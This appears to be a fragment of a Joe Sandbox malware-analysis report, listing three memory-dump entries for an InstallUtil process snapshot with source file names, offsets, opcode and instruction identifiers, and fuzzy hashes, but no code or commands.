                                        • Source File: 00000005.00000002.3359813639.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2450000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e0019f9ab136aec5c59cca608ac593852ea8b6a2a5fbc04437eefcd973d7b61
                                        • Instruction ID: 68d20665c4eaa52dcfbb0b33c9c0c262c2695d7b8503cc13d9948c1e0aecc921
                                        • Opcode Fuzzy Hash: 8e0019f9ab136aec5c59cca608ac593852ea8b6a2a5fbc04437eefcd973d7b61
                                        • Instruction Fuzzy Hash: 6CD09E75D43221CBDB044B749D1D25AF7F1AB48221B094957AC46C77D5EA3445958A00
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3359813639.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2450000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d480eb90842b9f656b6c5bab022b6e044ea1165340096fb8d35d08ebcab25c03
                                        • Instruction ID: c8e8b8cc1605753b786f5bf397ce16946d6ab333be9f9c87d6098d47c034ea7d
                                        • Opcode Fuzzy Hash: d480eb90842b9f656b6c5bab022b6e044ea1165340096fb8d35d08ebcab25c03
                                        • Instruction Fuzzy Hash: 1CC01271F42111C7DB004A748C1D25BB7F0E744211B080A5A9817D33C0EA3885828B04
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3359813639.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2450000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b78439415de3f3be417c97338b3dd6f62e4f973c60ec5d253cbcd95cb981c0cf
                                        • Instruction ID: b606d6307e21c67bac788949ba9d06144234fb21644a86275a57afee38d31ce6
                                        • Opcode Fuzzy Hash: b78439415de3f3be417c97338b3dd6f62e4f973c60ec5d253cbcd95cb981c0cf
                                        • Instruction Fuzzy Hash: DBA02230002B0C828A0032B22000228338C88002083C000FE8A0C08E2208B3E8A08888